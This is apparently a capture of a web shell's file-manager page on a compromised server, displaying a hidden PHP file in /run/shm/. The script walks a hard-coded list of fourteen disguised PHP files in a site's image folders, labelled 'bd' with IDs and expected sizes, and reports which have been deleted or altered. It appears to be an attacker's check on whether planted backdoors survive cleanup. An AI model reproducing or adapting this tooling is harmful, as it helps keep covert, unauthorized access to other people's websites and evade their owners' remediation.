Your IP : 216.73.216.209


Current Path : /run/shm/
Upload File :
Current File : //run/shm/.object

<?php   $r = '/home/stepboo2/kilarney.stepboo.com'; $x = ["/images/giantinflatables/archestents/referral.php"=>"bd@@5982721@@937",
"/images/giantinflatables/rooftops/newCourseGrade.php"=>"bd@@5987859@@940",
"/images/autoramp/test2.php"=>"bd@@5988372@@994",
"/images/stuff/changelog.php"=>"bd@@5981719@@851",
"/images/stuff/DOMLex.php"=>"bd@@5980966@@836",
"/images/giantinflatables/tunnels/editcontent.php"=>"bd@@5986629@@980",
"/images/giantinflatables/hotair/changePassword.php"=>"bd@@5983375@@981",
"/images/giantinflatables/characters/images2.php"=>"bd@@5986467@@1012",
"/images/giantinflatables/characters/espanol.php"=>"bd@@5983150@@990",
"/images/giantinflatables/rooftops/shop.inventory.php"=>"bd@@5986224@@972",
"/images/bobbers/Ralationship.php"=>"bd@@5988559@@1097",
"/images/stuff/workshop.php"=>"bd@@5981914@@1011",
"/images/stuff/acc_inv_tmpl.php"=>"bd@@5982178@@1005",
"/images/stuff/StringHash.php"=>"bd@@5982948@@932"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');